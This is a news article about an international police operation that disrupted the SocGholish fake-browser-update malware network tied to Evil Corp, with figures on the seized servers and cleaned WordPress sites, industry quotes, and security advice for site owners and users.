An international law enforcement coalition has struck one of the most notorious crimeware operations on the planet — not by arresting it, but by pulling the malware out from under it.
Police from the Netherlands, Germany, the United States and Canada have disrupted SocGholish, the malware network the suspected Russian-based cybercrime group Evil Corp uses to plant its first foothold inside victim systems.
The action is the latest phase of Operation Endgame, the international anti-cybercrime campaign launched in 2024 and billed as the largest of its kind. Earlier phases tore down some of the most prolific malware loaders in the ecosystem.
SocGholish is not ransomware. It is a JavaScript downloader — also known as FakeUpdates — that hijacks legitimate websites and tricks visitors into running a fake browser update. Install the update, and the malware opens a door. Usually what comes through it is ransomware.
SocGholish breaks into legitimate WordPress sites — usually through leaked admin credentials or vulnerable plugins — injects malicious JavaScript, and serves visitors a fake browser update.
Proofpoint, which tracks the operators as TA569 and supplied intelligence for the takedown, calls the group the “grandfather” of the web-inject threat. The adversary popularized the technique before copycats followed, such as ClearFake, ZPHP, and ErrTraffic.
Authorities took down 106 servers and domains and scrubbed malware from 14,971 infected WordPress sites. The Shadowserver Foundation, which ran victim notification, logged more than 1.44 million compromised WordPress sites available to SocGholish between May 2023 and May 2026 — across 1.13 million domains, 271,176 IP addresses, and 187 countries.
With more than 43% of all websites online running the WordPress platform, adversaries tailored their campaigns to WordPress site owners. According to authorities, SocGholish amassed login credentials for roughly 1.4 million sites. The infected sites consisted of restaurants and auto repair shops.
Infoblox, also part of the operation, reported 55% of its cloud customers were exposed to SocGholish in 2026. “SocGholish is not a niche threat,” said Dr. Renée Burton, the firm’s vice president of threat intelligence. Most of those contacts never became infections — a traffic-filtering layer screens out researchers and bots and routes only chosen targets to the fake update. That filtering is why the operation was able to hide in plain sight for years.
“With these actions we deprive cybercriminals of access to infected computer systems,” said Maikel Rollman of the Netherlands National High Tech Crime Unit. He called the takedown the beginning of further action against SocGholish, not the end.
The FBI Cyber Division, which took part in the operation, framed SocGholish as an initial-access threat, saying the malware establishes a foothold on victim computers, folds those machines into a botnet and gives threat actors a launch pad for ransomware campaigns and espionage. The bureau also issued a June 18 IC3 alert warning that malicious traffic-distribution systems can redirect users from legitimate websites to malware, phishing pages and network-access schemes.
The US Treasury sanctioned the group in 2019, tying its Dridex banking malware to more than $100 million in theft across 40-plus countries and putting a $5 million bounty on its leader, Maksim Yakubets. The US, UK and Australia widened the net in 2024, naming more members and a reported “Dridex 2.0.”
By Infoblox’s account, a 2022 Mandiant report found that Evil Corp — tracked then as UNC2165 — drew its initial access almost exclusively from TA569’s SocGholish.
Among the actions was a mass takedown of the WordPress sites and servers used to spread the infection. The Dutch police removed backdoors from the cleaned sites and notified owners, urging them to rotate credentials, enable multi-factor authentication, delete unknown admin accounts, and keep their installs current.
The traffic-distribution service that funneled victims to SocGholish was not part of the takedown. And Proofpoint warned that past Operation Endgame targets have rebuilt their infrastructure after disruption.
For end users, the tell is the unsolicited update. A real update comes from the browser or the app store, never from a pop-up on a site you happened to visit. SocGholish disguises itself as a necessary update; run it, and you take the payload.
The aim, say authorities, is to cut down on the reach of Evil Corp and its ransomware activities. For now, that reach is smaller. No one is calling it gone.
Shaun Nichols is an IT news journalist. He has spent nearly 20 years covering the industry with a specialty in cybersecurity.
